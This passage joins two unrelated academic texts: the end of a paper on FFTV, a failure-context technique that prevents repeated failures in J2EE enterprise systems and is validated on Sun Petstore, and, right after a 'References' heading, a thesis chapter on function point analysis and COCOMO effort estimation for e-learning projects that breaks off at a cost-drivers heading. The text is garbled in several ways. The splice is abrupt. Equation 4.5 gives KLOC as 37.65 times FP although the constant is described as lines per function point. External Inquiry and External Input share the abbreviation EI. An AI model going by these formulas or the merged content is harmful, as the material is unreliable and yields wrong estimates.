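        // Only a violation-free AddItem (weight 1) matched:
        double m2 = coverage(new int[]{1}, total);           // 1 / 184 ~ 0.005
        System.out.println(m2 > ACTIVATION_RATE); // prints false: not activated
    }
}
```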
Our technique depends on 5 parameters: \(k, k_{\text{diff}}, k_{\text{same}}, \text{cov}\) and activation rate. We provide default values for all parameters. Fine-tuning the parameters according to empirical evidence is part of our ongoing research work.
In addition to the matching-based identification of failure contexts illustrated above, which considers the number of executed actions with anomalies but not the type of violations, we use an identification technique based on the type of anomalies. In particular, given a failure detected by a violation or a caught exception, we identify a set of violations that are strictly related to the failure. For instance, in the case of failures revealed by capturing NullPointerExceptions, relevant violations are given by models violated with null values. If any of the actions in a failure context is associated with a relevant violation, the failure context is activated, independently of the matching level. This mechanism supports the identification of specific problems that are usually caused by particular values assigned to variables. The definition of relevant violations can be generalized to other exceptions and assertions. For instance, it is possible to relate the IndexOutOfBoundsException to assertions that limit the range of values assigned to a variable. We have currently defined this mechanism only for the NullPointerException. Generalizing this strategy to other exceptions and assertions is part of future work.
8 Prevention Mechanisms
In this paper, we implemented a non-disruptive prevention mechanism by using the transaction service available in J2EE application servers. We extended the controllers of enterprise systems in the following way: when actions are executed, controllers ask the observer to identify potentially dangerous actions, that is, actions that activate failure contexts. If the observer does not identify the action as potentially dangerous, the action is executed normally. If the action is identified as potentially dangerous, the controller initiates a transaction before executing the action normally. If the action is executed successfully, the transaction is simply committed, with limited impact on system performance. If an oracle identifies a failure, the system propagates an exception of type AssertionException to the controller, which rolls back the execution to a correct state and suitably warns the user. The scope of the transactions activated to prevent failures matches the execution of the single actions identified as dangerous. The mechanism recovers from failures, and users can continue working with the system.
9 Early Validation
We validate the FFTV approach by measuring the ability of the technique to generate failure contexts for a specific class of problems: failures caused by unexpected values that are processed by enterprise systems, either because the application erroneously accepts incorrect inputs from users or because of corrupted data in databases. We focused on this class of problems for the initial validation because enterprise systems with complex user interfaces and input from external sources often suffer from such problems.
We conducted the first experiments with the Sun Petstore enterprise system version 1.4 [24], a sample application developed by Sun Microsystems to demonstrate the features of J2EE 1.4 application servers. The Sun Petstore implements a classic web shop that includes functionalities like user authentication, cart management, catalog browsing, and administration. We designed 8 assertions that check the correctness of the data used to ship orders. To evaluate the capability of FFTV to create failure contexts for the considered class of faults, we removed all consistency checks on both input values and data extracted from the database. We executed the Sun PetStore with test cases that focus on boundary or incorrect inputs, for instance, test cases that add users with incorrect shipping addresses, buy negative quantities of items, and insert incorrect values in the database. We revealed a total of 9 failures. FFTV captured all these problems by creating 9 suitable failure contexts. In one case, FFTV recovered from a failure not easily revealed with classic approaches: the total cost of the items in the cart is always displayed as a positive value, even when it is a negative number. Thus, users cannot distinguish carts with negative prices from carts with positive ones by simply inspecting the output.
The early validation also highlighted the effectiveness of def-use chains for selecting relevant program points. Def-use chains automatically identify actions that may appear unrelated but can interfere during system execution; for instance, action addItem generates information relevant for the successful execution of action PurchaseOrder. Moreover, def-use chains automatically discard actions that are not related from the execution viewpoint, even if they apparently work on similar components; for instance, action getItem is not relevant for action PurchaseOrder, even though they work on similar data structures. This information is extremely useful when creating failure contexts, because irrelevant actions that could hide important actions are automatically filtered out. For example, the execution of several getItem actions will never affect an addItem action in failure contexts associated with a problem in action PurchaseOrder.
The experience gained so far with the Sun Petstore indicates that the extra statements added by our technique introduce a limited overhead, not perceivable by end-users. In fact, at each program point, FFTV evaluates only simple Boolean expressions, and FFTV evaluates failure contexts only when the observer detects activating actions. Moreover, evaluating failure contexts consists of matching two sets of a maximum size $k$, which is fast, especially if the available memory allows the operation to be performed without accessing secondary memory.
In this early experience with FFTV, we studied effectiveness of the technique when testers specify a limited set of focused assertions (in our investigation we focused on correctly shipping user orders). We are currently extending the validation to a wider class of faults, and we are studying the scalability of the technique to a large number of assertions.
10 Related Work
Self-protecting techniques have been widely studied for hardware systems [15, 2]. The many techniques for design for testability, Built-In Self-Test, and Built-In Self-Repair are effective for hardware devices, but they focus mostly on manufacturing faults, are based on fault models not shared with software systems, and do not apply well to many relevant software problems.
Classic failure prevention techniques for software systems can be classified in two main groups: failure specific and general techniques. Failure specific techniques support developers in defining proper procedures to handle problems that can be predicted at design-time. Main approaches are based on the development of defensive code and design of checking mechanisms, e.g., defensive programming [29], assertions [6], self-checking systems [27] and exception handlers [21].
General techniques aim to preserve system functionalities in case of catastrophic events. The main techniques have been studied for safety-critical applications by the fault-tolerance community [1]. Common fault-tolerance approaches include redundancy, service relocation, and transactional services [25], which add dynamic recovery mechanisms, as well as rejuvenation features [26], which prevent aging problems, that is, systems whose state degrades over time, potentially leading to failures.
Failure specific techniques can handle problems that can be predicted at design-time, but they cannot deal with failures difficult to predict before deployment, such as environmental problems, for instance problems deriving from a specific context of use; configuration problems, for instance problems deriving from the integration of the application with other systems; or domain dependent problems, for instance unexpected ranges of values in a specific domain.
General techniques can deal with general catastrophic events, but cannot effectively cope with application specific problems that do not produce catastrophic effects.
Several techniques to prevent failures and design healing strategies complement the aforementioned techniques. For instance, Zachariadis, Mascolo and Emmerich defined a framework for designing mobile systems that can automatically adapt to different environmental conditions [28]. Cheng, Garlan and Schmerl defined a language that supports the definition of domain-level objectives dynamically enforced on a target system [5]. Modafferi, Mussi and Pernici defined a plug-in to add recovery mechanisms to WS-BPEL engines [20]. Several researchers outlined the idea of using external models to support adaptation and healing mechanisms, and implementing healing and prevention procedures by changing architectures and using advanced services such as transactions [22, 9].
These approaches provide ideas or frameworks to support the definition of complex techniques, but do not propose complete prevention or healing techniques. In this paper, we present a complete technique to detect failure conditions at run time, and to prevent repeated failures of the same type in enterprise systems. Our work represents an initial step towards the definition of a complete self-prevention technique for many types of functional faults in enterprise systems.
11 Conclusions
Since enterprise systems usually offer 24/7 services, reliability and high availability are extremely important. Classic fault-tolerance approaches can cope with catastrophic events that can be predicted at design-time, but are not effective with unpredictable environmental, configuration,
and domain dependent failures.
In this paper, we present a self-prevention technique that automatically generates failure context models, which capture execution conditions that may lead to failures, and uses these models to prevent future occurrences of recurrent failures.
Early validation shows that the technique works with limited overhead and can effectively prevent some classes of failures; preliminary experiments have been conducted with failures that depend on incorrect user inputs or corrupted data stored in databases.
We are currently conducting a large set of experiments to fully validate the technique and to empirically identify the scope of the approach. We are also extending the technique in several directions.
Acknowledgment This work is partially supported by the European Community under the Information Society Technologies (IST) programme of the 6th FP for RTD - project SHADOWS contract IST-035157.
References
CHAPTER 4
EFFORT ESTIMATION ANALYSIS
4.1 INTRODUCTION
Corporations are moving from an industrial-based society to a knowledge-based society. They face a major issue in how to use training systems to establish a continuous-learning philosophy in training. Corporations view continuous learning as the key to competitive merit, and training is seen as one element of the broad orientation towards continuous improvement. The emerging knowledge and skill demands, and the geographic spread of the workspace, require minimal costs and accessibility for anytime/anywhere learning. E-learning provides a solution to this scenario by enabling learning anywhere, at any time. However, many educational institutions and organizations have not updated their infrastructure and resources to run e-learning solutions.
Many organizations are working to expand e-learning interventions, and it becomes increasingly complex to assess their readiness to adopt the technology and implement the system successfully. Learning strategies are adjusted with the help of e-learning effort estimation. Also, previous failures of e-learning interventions show the need for a comprehensive readiness assessment to minimize risk. Still, none of the effort estimation techniques is universally accepted by the community, since none of them delivers reliable estimates for diverse environments. Each technique is suitable for some specific domain due to its nature and characteristics.
This chapter proposes an effort estimation technique suitable for e-learning projects. The proposed model is formulated with the help of Function Point Analysis (FPA) combined with the basic COCOMO model. Finally, the linear regression method is applied to the effort estimates to show the relationship between function points and effort.
4.2 CONCEPT OF METHODOLOGY
Effort estimation is a major part of the e-learning project development process. Software sizing techniques are classified into code-based sizing and functional size measurement. A code-based sizing metric estimates the size and complexity of the project from the programmed source code. Since a substantial amount of effort is devoted to programming, a suitable measure that correctly quantifies the code is accepted as a perceivable indicator of software cost. The baseline size measure for effort estimation models is the count of new Lines of Code (LOC). SLOC is a code-based sizing metric; it refers to Source Lines of Code delivered as part of the project, including drivers and other necessary software. Code size is expressed in thousands of SLOC (KLOC). The objective is to evaluate the amount of intellectual work involved in the project development. Evaluation of SLOC takes the new LOC into account. There are two possibilities:
1. To count the SLOC checklists or supported tools (or)
2. To count the Unadjusted Function Points (UFPs) to translate them through backfiring table to SLOC.
SLOC is largely accepted for the following reasons:
- It correlates highly with software cost.
- It is an appropriate input for software estimation models.
- It can be precisely and easily counted with the help of software tools, which eliminates inconsistencies in SLOC counts.
The basic COCOMO model suite provides a powerful means to predict software costs. Reliable size estimation is essential for a good model estimate. Size estimation is still a challenging task, because projects are usually developed with a mix of new, reused, and automatically converted code. The FPA method is an alternative to code-based sizing methods. It considers the static and dynamic features of the system being sized. The static feature is represented by the data accessed or stored by the system. The dynamic feature reflects the transactions performed to manipulate and access the data.
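The backfiring translation from Unadjusted Function Points to SLOC, mentioned as the second counting possibility above, can be sketched as a simple table lookup. The gearing factors (SLOC per function point) below are rough, commonly cited figures and vary widely across published backfiring tables; treat them as illustrative assumptions only:

```python
# Illustrative backfiring table: average SLOC per function point.
# These gearing factors are approximate and differ between sources.
GEARING_FACTORS = {"c": 128, "java": 53, "python": 27}

def backfire_sloc(ufp, language):
    """Translate Unadjusted Function Points into an SLOC estimate
    through the backfiring table for the given language."""
    return ufp * GEARING_FACTORS[language.lower()]
```

For example, 100 UFP backfired through the Java factor above would yield an estimate of 5300 SLOC.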
4.3 ESTIMATION ANALYSIS ON E-LEARNING PROJECT DEVELOPMENT TOOLS
From the relevant literature, COCOMO is identified as suitable for effort estimation of e-learning projects (Moseley and Valverde 2014). COCOMO appears at three levels:
• Basic COCOMO,
• Intermediate COCOMO and
• Advanced or detailed COCOMO
The basic COCOMO model is a single-valued, static model that estimates the project development time and cost as functions of the program size, expressed in thousands of delivered source instructions (KDSI). The intermediate COCOMO model calculates the effort as a function of the program size and a group of 15 cost drivers, which consist of subjective assessments of product, hardware, personnel, and project attributes. An *advanced or detailed COCOMO model* combines all the properties of the intermediate version with the cost drivers' impact on each stage of the software engineering process, such as analysis and design.
Three types of COCOMO models are applied in the proposed effort estimation model, with each level progressively providing more precise estimates. Boehm proposed that any software development project can be categorized into one of the following three classes, based on its complexity level:
1. **Organic**
2. **Semi-detached** and
3. **Embedded.**
Boehm considers not only the characteristics of the product, but also the development team and environment. These three classes broadly correspond to application programs, utility programs, and system programs.
**Organic** – A project can be classified as organic if it involves a well-understood application program, the team size is reasonably small, and the team members are experienced in developing similar types of projects.
**Semi-detached** – A project can be classified as semi-detached if the team consists of a mixture of experienced and inexperienced developers, who have only limited experience with related systems and may be unfamiliar with some aspects of the project being developed.
**Embedded** – A project can be classified as embedded if it is strongly coupled with complex hardware, or subject to rigorous constraints on operational procedures.
In this research work, the e-learning projects are categorized into simple, medium, and complex projects based on their content; details are provided in Chapter 3. Text-based e-learning courses are categorized as simple projects; their contents are text with hyperlinks and other materials. Figure 4.1 shows an example of a simple e-learning project. It uses only text-based contents with some illustrative diagrams.

Animation-based e-learning courses are categorized as medium projects; their contents are moving illustrations or diagrams coupled with audio. Figure 4.2 shows an example of a medium e-learning project. It uses whiteboard animation to showcase the author's resume and career background.
Figure 4.2 Example of medium e learning project (text + audio based)
Video based courses and the combination of text, audio and video based courses are categorized into complex projects.
Figure 4.3 Example for complex e learning project (text + audio + video based)
Usually, the contents are full motion video clippings of lecture or a dramatized sequence. Figure 4.3 shows an example of a complex project. The video based online course contains the text, audio and video contents for e-learners.
Organic mode calculation is applied for small projects, semi-detached calculation for medium projects, and embedded calculation for complex projects. Table 4.1 shows the development modes of the basic COCOMO model. It illustrates the size, innovation, constraints, and development environment for the three operating modes.
**Table 4.1 Development Modes of Basic COCOMO Model**
<table>
<thead>
<tr>
<th>S. No</th>
<th>Development Mode</th>
<th>Size</th>
<th>Innovation</th>
<th>Constraints</th>
<th>Dev. Environment</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>Organic</td>
<td>Small</td>
<td>Little</td>
<td>Not tight</td>
<td>Stable</td>
</tr>
<tr>
<td>2.</td>
<td>Semi-detached</td>
<td>Medium</td>
<td>Medium</td>
<td>Medium</td>
<td>Medium</td>
</tr>
<tr>
<td>3.</td>
<td>Embedded</td>
<td>Large</td>
<td>Greater</td>
<td>Tight</td>
<td>Complex hardware/customer interfaces</td>
</tr>
</tbody>
</table>
The basic COCOMO model gives a fairly accurate estimate of the e-learning project parameters. It is expressed by the following equations:
\[
\text{Effort} = k_1 \times (\text{KLOC})^{k_2} \text{ PM} \tag{4.1}
\]
\[
\text{Tdev} = l_1 \times (\text{Effort})^{l_2} \text{ Months} \tag{4.2}
\]
Here,
- KLOC denotes the estimated size of the e-learning project and it is expressed in terms of kilo lines of code.
- $k_1$, $k_2$, $l_1$, $l_2$ denote the constants for each category of e-learning projects.
- Tdev denotes the estimated duration for developing the project, expressed in months.
- Effort denotes the total amount of effort required to develop the project, expressed in Person-Months (PMs).
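Equations (4.1) and (4.2) can be turned into a small calculator. As a sketch, the constants below are Boehm's standard 1981 basic-COCOMO values for the three modes; the text itself does not fix $k_1$, $k_2$, $l_1$, $l_2$ numerically:

```python
def basic_cocomo(kloc, mode):
    """Basic COCOMO estimate: effort in Person-Months (Eq. 4.1) and
    development time in months (Eq. 4.2). The (k1, k2, l1, l2)
    constants per mode are Boehm's standard 1981 values."""
    constants = {
        "organic":       (2.4, 1.05, 2.5, 0.38),
        "semi-detached": (3.0, 1.12, 2.5, 0.35),
        "embedded":      (3.6, 1.20, 2.5, 0.32),
    }
    k1, k2, l1, l2 = constants[mode]
    effort = k1 * kloc ** k2   # Person-Months
    tdev = l1 * effort ** l2   # Months
    return effort, tdev
```

For a 32 KLOC organic project this gives roughly 91 PM of effort over about 14 months; the same size in embedded mode costs substantially more effort.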
4.4 PROCEDURE FOR CALCULATING FUNCTION POINT ANALYSIS
Function Point Analysis (FPA) is the standard metric for measuring the functional size of a software system. The first published work about function points was written in the late 1970s by A.J. Albrecht of IBM, for a transaction-oriented system (Futrell et al. 2001). FPA is used to predict the effort of a software project in the early stages of the life cycle. It measures the complexity of the functions and overcomes the limitations of Lines of Code. FPA helps developers and users quantify the size and complexity of software application functions in a way that is useful to software users (Furey 1997).
Objectives of FPA
FPA measures software by calculating the functionality the software delivers to the user based principally on logical intent. The main objectives of FPA are listed as follows:
- It measures software growth and maintenance independently of the technology applied for implementation.
• It estimates the functionality that the user requires and receives.
- It provides a consistent measure across different organizations and projects.
- It keeps the overhead of the measurement procedure low.
4.4.1 Procedure Diagram for Function Point Counting
**Figure 4.4 Procedure Diagram for function point analysis**
Figure 4.4 shows the procedure diagram for Function Point Counting (FPC).
**Step 1: Determine type of count**
The initial step is to calculate the type of function point count. It can be associated with either applications or projects. There are three kinds of FPCs:
1. Development project FPC
2. Enhancement project FPC
3. Application FPC
**Step 2: Identify the counting scope and boundary**
The counting scope defines the functionality included in the particular FPC. The application boundary denotes the border between the software being measured and the user.
**Step 3: Determine the Unadjusted FPC (UFPC)**
Unadjusted function point specifies the total number of function points depending on the following two factors:
1. Data functions
2. Transaction functions.

**Figure 4.5 Factors of UFPC**
Figure 4.5 illustrates the two factors and their types of UFPC.
**Step 3.1: Count Data Functions**
There are two types of data functions. They are:
1. Internal logical file (ILF): ILF is a user identifiable group of logically related data or control information maintained within the boundary of the application.
2. External Interface File (EIF): EIF is a user identifiable group of logically related data or control information referred by the application, but maintained within the boundary of another application (SE 2010).
**Step 3.2: Count Transaction Functions**
There are three types of transaction functions. They are:
1. External Input (EI): External Inputs are received by the software from the user and provide application-oriented data.
2. External Output (EO): External Outputs are items the software provides to the outside of the system, such as screen data, report data, error messages, and so on.
3. External Inquiry (EI): Inquiries are commands or requests generated from outside, involving direct access to a database to retrieve information (SE 2010).
Table 4.2 shows the computing procedure for UFP for the five categories of data and transaction functions. In Table 4.2, a constant weight is assigned to each function type depending on its complexity.
Table 4.2 UFP Calculations
<table>
<thead>
<tr>
<th>Sno</th>
<th>Function Type</th>
<th>Weight by Functional Complexity</th>
<th>Total (FP)</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>External Input (EI’s)</td>
<td>Low __ x 3</td>
<td>Total = count of EI x 3</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 4</td>
<td>Total = count of EI x 4</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 6</td>
<td>Total = count of EI x 6</td>
</tr>
<tr>
<td>2.</td>
<td>External Output (EO’s)</td>
<td>Low __ x 4</td>
<td>Total = count of EO x 4</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 5</td>
<td>Total = count of EO x 5</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 7</td>
<td>Total = count of EO x 7</td>
</tr>
<tr>
<td>3.</td>
<td>External Enquiry (EI’s)</td>
<td>Low __ x 3</td>
<td>Total = count of EI x 3</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 4</td>
<td>Total = count of EI x 4</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 6</td>
<td>Total = count of EI x 6</td>
</tr>
<tr>
<td>4.</td>
<td>Internal Logical File (ILF)</td>
<td>Low __ x 7</td>
<td>Total = count of ILF x 7</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 10</td>
<td>Total = count of ILF x 10</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 15</td>
<td>Total = count of ILF x 15</td>
</tr>
<tr>
<td>5.</td>
<td>External Interface File (EIF)</td>
<td>Low __ x 5</td>
<td>Total = count of EIF x 5</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Average __ x 7</td>
<td>Total = count of EIF x 7</td>
</tr>
<tr>
<td></td>
<td></td>
<td>High __ x 10</td>
<td>Total = count of EIF x 10</td>
</tr>
</tbody>
</table>
Total Number of UFPs: Sum of the total FP
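The UFP computation in Table 4.2 amounts to a weighted sum of function counts. A minimal sketch, using the low/average/high weights from the table (the count layout is an illustrative choice):

```python
# Complexity weights from Table 4.2 for the five function types.
WEIGHTS = {
    "EI":  {"low": 3, "average": 4, "high": 6},
    "EO":  {"low": 4, "average": 5, "high": 7},
    "EQ":  {"low": 3, "average": 4, "high": 6},   # External Enquiry
    "ILF": {"low": 7, "average": 10, "high": 15},
    "EIF": {"low": 5, "average": 7, "high": 10},
}

def unadjusted_fp(counts):
    """counts maps (function_type, complexity) -> number of functions;
    the UFP total is the weighted sum over all entries."""
    return sum(n * WEIGHTS[ftype][level]
               for (ftype, level), n in counts.items())
```

For example, two low-complexity External Inputs and one average Internal Logical File contribute 2 × 3 + 1 × 10 = 16 UFP.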
Step 4: Determine the Value Adjusted Factors (VAF)
VAF represents the general functionality provided to the user of the corresponding application. It consists of 14 General System Characteristics (GSCs). Each characteristic has associated definitions that assist in determining its degree of influence, rated on a scale from 0 to 5, ranging from no influence to strong influence.
General System Characteristics (GSCs)
The next step, following calculation of the unadjusted function points, involves gathering information about the environment and complexity of the project or application and rating each characteristic on a scale from 0 to 5 (degree of influence) (Vickers and Street 2001).
Degree of Influence
Each characteristic should be examined for its Degree of Influence (DI) on a scale from 0 to 5. Table 4.3 shows the scale values and their influence. The 14 characteristics are illustrated in Table 4.4.
**Table 4.3 Degree of Influence**
<table>
<thead>
<tr>
<th>SNo.</th>
<th>Scale</th>
<th>Influence</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>0</td>
<td>No influence</td>
</tr>
<tr>
<td>2.</td>
<td>1</td>
<td>Incidental influence</td>
</tr>
<tr>
<td>3.</td>
<td>2</td>
<td>Moderate influence</td>
</tr>
<tr>
<td>4.</td>
<td>3</td>
<td>Average influence</td>
</tr>
<tr>
<td>5.</td>
<td>4</td>
<td>Significant influence</td>
</tr>
<tr>
<td>6.</td>
<td>5</td>
<td>Strong influence</td>
</tr>
</tbody>
</table>
**Table 4.4 General System Characteristics (Vickers and Street 2001)**
<table>
<thead>
<tr>
<th>Sno.</th>
<th>General System Characteristics</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>Data Communication</td>
</tr>
<tr>
<td>2.</td>
<td>Distributed Data Processing</td>
</tr>
<tr>
<td>3.</td>
<td>Is performance critical?</td>
</tr>
<tr>
<td>4.</td>
<td>Heavily Used configuration</td>
</tr>
<tr>
<td>5.</td>
<td>Transaction Rate</td>
</tr>
<tr>
<td>6.</td>
<td>Online Data Entry</td>
</tr>
<tr>
<td>7.</td>
<td>End-User Efficiency</td>
</tr>
<tr>
<td>8.</td>
<td>Online Update</td>
</tr>
<tr>
<td>9.</td>
<td>Complex Processing</td>
</tr>
<tr>
<td>10.</td>
<td>Reusability</td>
</tr>
<tr>
<td>11.</td>
<td>Installation Ease</td>
</tr>
<tr>
<td>12.</td>
<td>Operational Ease</td>
</tr>
<tr>
<td>13.</td>
<td>Multiple Site</td>
</tr>
<tr>
<td>14.</td>
<td>Facility Change</td>
</tr>
</tbody>
</table>
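As a sketch, the 14 Degree-of-Influence ratings can be combined into the VAF and an adjusted function point count. The formula below is the standard IFPUG adjustment, VAF = 0.65 + 0.01 × ΣDI; it is assumed here, since the text does not state it explicitly:

```python
def value_adjustment_factor(degrees):
    """degrees: the 14 Degree-of-Influence ratings, each 0..5
    (Table 4.3).  Standard IFPUG formula (assumed, not stated in
    the text): VAF = 0.65 + 0.01 * sum(DI), so 0.65 <= VAF <= 1.35."""
    assert len(degrees) == 14 and all(0 <= d <= 5 for d in degrees)
    return 0.65 + 0.01 * sum(degrees)

def adjusted_fp(ufp, degrees):
    """Adjusted function points: AFP = UFP x VAF."""
    return ufp * value_adjustment_factor(degrees)
```

With all 14 characteristics rated 3 (average influence), 100 UFP would adjust to 100 × 1.07 = 107 function points.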
Data Communication
Data communication defines the degree of direct interaction of the system with other applications. Data and control details are sent and received through suitable communication services. Terminals associated with the control unit are considered in the utilization of communication services. Every data communication connection needs some kind of protocol, that is, a set of conventions that allows data transfer between two devices or systems. Table 4.4 describes the score definition for data communication.
Distributed Data Processing
Distributed data processing defines the degree to which the application transfers or shares data among its components. Distributed data or processing functions are a characteristic of the application within the application boundary.
Performance
It defines the degree to which response time and throughput performance considerations influence the application development. Performance objectives, approved by the user in terms of throughput or response, influence the development, design, support, and installation of the application.
Heavily Used Configuration
It defines the degree to which computer resource limitations influence the application development. A heavily used operational configuration requires special design considerations. The user needs to execute the application on a dedicated device that will be heavily used.
Transaction Rate
It defines the degree to which the rate of business transactions influences the application development. When the rate is high, it influences the development, design, support, and installation of the application.
Online Data Entry
It defines the degree to which data is entered through interactive transactions. Online data entry and control functions are provided in the application.
End-User Efficiency
It defines the degree of consideration given to ease of use and human factors for the user of the measured application. The online functions emphasize a design for end-user efficiency. End-user design includes the following:
- Menus
- Navigational supports such as function keys, jumps and dynamically generated menus
- Scrolling
- Pre-assigned function keys
- Online help and documents
- Automated cursor movement
- Cursor selection of screen data
- Remote printing through online transactions
- Pop-up windows
- Heavy use of highlighting, color, underlining, reverse video and other indicators
- Bilingual and multilingual support
- As few screens as possible to accomplish a business function
Online Update
It defines the degree to which the ILFs are updated online. The application provides online update of the ILFs.
Complex Processing
It defines the degree to which processing logic influences the development of the application. The following components are present:
• Sensitive control/ application specific security processing
• Extensive mathematical processing
• Extensive logical processing
• Incomplete transaction due to the exception processing that should be processed again.
• Complex processing to manage the multiple I/O possibilities.
Reusability
It defines the degree to which the application and its code have been specifically designed, developed and supported so that they can be reused in other applications.
Installation Ease
It defines the degree to which conversion from a previous environment influences the development of the application. Conversion and installation ease are characteristics of the application; a conversion and installation plan and/or conversion tools are provided and tested during the system test phase.
Operational Ease
It defines the degree to which the application attends to operational concerns such as start-up, back-up and recovery processes. The application minimizes the need for manual activities such as tape mounts, paper handling and direct on-location manual intervention.
Multiple Sites
It defines the degree to which the application has been designed for multiple installation sites and user organizations. It has been specifically designed, developed and supported to be installed at multiple sites for multiple organizations.
Facilitate Change
It defines the degree to which the application has been specifically designed, developed and supported to facilitate change. The following characteristics apply:
- Flexible query and report facilities are provided to handle simple requests, such as logic applied to only one ILF.
- Flexible query and report facilities are provided to handle requests of average complexity, such as logic applied to more than one ILF.
- Flexible query and report facilities are provided to handle complex requests, such as logic combinations on one or more ILFs.
- Business control data is kept in tables that are maintained by the user with online interactive processes, but changes take effect only on the following business day.
- Business control data is kept in tables that are maintained by the user with online interactive processes, and changes take effect immediately.
After rating all 14 GSCs, the Value Adjustment Factor (VAF) is calculated. The formula used to calculate the VAF is given in equation (4.3):
\[
VAF = 0.65 + \left(0.01 \times \sum_{i=1}^{14} C_i\right)
\]
(4.3)
**Step 5: Calculate the Adjusted FPC (AFPC)**
After calculating the UFP from the transactional and data function types and obtaining the VAF, the adjusted Function Point Count (FP) is calculated. The formula for calculating the function point count is shown in equation (4.4).
\[
FP = UFP \times VAF
\]
(4.4)
The lines of code can be calculated using equation (4.5).
\[
KLOC = 37.65 \times FP
\]
(4.5)
The constant value 37.65 is the average number of lines of code per function point, derived from the standard programming-language-to-SLOC-per-function-point conversion table for multi-language development.
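The five-step calculation above (rating the GSCs, computing the VAF, adjusting the UFP, and converting to lines of code) can be sketched as follows. The GSC ratings and the UFP value in the usage lines are hypothetical illustrations, not data from this study.

```python
# Sketch of the adjusted function point calculation (equations 4.3-4.5).
# The UFP value and GSC ratings below are illustrative assumptions.

def value_adjustment_factor(gsc_scores):
    """Equation (4.3): VAF = 0.65 + 0.01 * sum of the 14 GSC scores (each 0-5)."""
    assert len(gsc_scores) == 14
    return 0.65 + 0.01 * sum(gsc_scores)

def adjusted_function_points(ufp, vaf):
    """Equation (4.4): FP = UFP * VAF."""
    return ufp * vaf

def lines_of_code(fp, loc_per_fp=37.65):
    """Equation (4.5): size estimated from FP via an average LOC-per-FP ratio."""
    return fp * loc_per_fp

gsc = [3, 2, 4, 3, 3, 4, 3, 3, 2, 1, 2, 3, 2, 2]  # hypothetical ratings
vaf = value_adjustment_factor(gsc)
fp = adjusted_function_points(120, vaf)            # hypothetical UFP = 120
loc = lines_of_code(fp)
print(round(vaf, 2), round(fp, 2), round(loc, 2))
```

Since each of the 14 scores lies between 0 and 5, the VAF is always between 0.65 and 1.35, so the adjustment can move the unadjusted count by at most ±35%.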
4.5 EFFORT ESTIMATION OF E-LEARNING PROJECTS USING BASIC COCOMO
After obtaining the functional size of the e-learning projects, the effort, time and average staff required to complete each project are calculated using the basic COCOMO model. In the basic COCOMO model, the effort, time and cost of the e-learning projects are estimated using only the lines of code.
Effort estimation is calculated for simple projects using Boehm’s COCOMO model for organic projects and is depicted in equation (4.6).
\[
\text{Effort} = 2.4 \times (\text{KLOC})^{1.05} \text{Per Month} \quad (4.6)
\]
Effort estimation is calculated for medium projects using Boehm’s COCOMO model for semi-detached projects and is depicted in equation (4.7).
\[
\text{Effort} = 3.0 \times (\text{KLOC})^{1.12} \text{Per Month} \quad (4.7)
\]
Effort estimation is calculated for complex projects using Boehm’s COCOMO model for embedded projects and is depicted in equation (4.8).
\[
\text{Effort} = 3.6 \times (\text{KLOC})^{1.20} \text{Per Month} \quad (4.8)
\]
The development time can be estimated using the organic, semi-detached and embedded formulae, which correspond to the three categories of projects.
The effort estimation of simple projects can be treated as the organic type, as only e-learning text content is involved in these projects. The development team can be small, because the content is easy for subject experts to create and for an instructional designer to implement. The development time needed for simple projects is calculated using the formula given in equation (4.9).
\[
\text{Organic} \quad : \quad T_{\text{dev}} = 2.5(\text{Effort})^{0.38} \quad (4.9)
\]
Effort estimation of medium projects can be treated as the semi-detached type, as these projects involve text, animation, audio, video, etc. The team can be a mixture of developers, such as content developers and animators who add effects to the images. The development time needed for medium projects is calculated using the formula given in equation (4.10).
\[
\text{Semi-detached} : T_{\text{dev}} = 2.5(\text{Effort})^{0.35} \quad (4.10)
\]
Complex projects, such as those involving complex animations, simulations and action scripts, are treated as the embedded type. The development time needed for these projects is calculated using the formula given in equation (4.11).
\[
\text{Embedded} \quad : \quad T_{\text{dev}} = 2.5(\text{Effort})^{0.32} \quad (4.11)
\]
In the three types of projects, the estimation of development time is calculated according to Boehm definition of organic, semi-detached and embedded.
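The basic COCOMO equations (4.6)-(4.11) can be sketched as a small helper that maps a project category to Boehm's standard coefficients; the KLOC value in the usage line is a hypothetical input.

```python
# Sketch of basic COCOMO effort and development-time estimation
# (equations 4.6-4.11). Coefficients are Boehm's standard basic-model values.

COEFFS = {
    # mode: (a, b, c) where effort = a * KLOC^b and Tdev = 2.5 * effort^c
    "organic":       (2.4, 1.05, 0.38),
    "semi-detached": (3.0, 1.12, 0.35),
    "embedded":      (3.6, 1.20, 0.32),
}

def basic_cocomo(kloc, mode):
    """Return (effort in person-months, development time in months)."""
    a, b, c = COEFFS[mode]
    effort = a * kloc ** b    # equations (4.6)-(4.8)
    tdev = 2.5 * effort ** c  # equations (4.9)-(4.11)
    return effort, tdev

effort, tdev = basic_cocomo(10.0, "organic")  # hypothetical 10 KLOC project
print(round(effort, 2), round(tdev, 2))
```

Note that a simple (organic) e-learning project uses the smallest coefficient and exponent, so for the same KLOC it always yields the lowest effort of the three modes.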
### 4.6 INTERMEDIATE COCOMO MODEL IN E-LEARNING PROJECTS
The intermediate COCOMO model uses size and modes in the same way as the basic COCOMO model. Additionally, it has 15 variables called cost drivers and modified effort equations. KLOC and the cost driver ratings are given as inputs to this model, which improves the effort estimates. The intermediate COCOMO formula is given in equation (4.12).
\[ Effort (E) = a \times (size)^b \times C \]
(4.12)
In this equation, the coefficient a and the exponent b vary for each mode, and C is the product of the cost drivers. This model has three modes, similar to the basic model, but with modified constants. The equations are:
Effort calculation for organic mode,
\[ E = 3.2 \times (size)^{1.05} \times C \]
(4.13)
Effort calculation for semidetached mode,
\[ E = 3.0 \times (size)^{1.12} \times C \]
(4.14)
Effort calculation for embedded mode,
\[ E = 2.8 \times (size)^{1.20} \times C \]
(4.15)
### 4.6.1 Cost Drivers
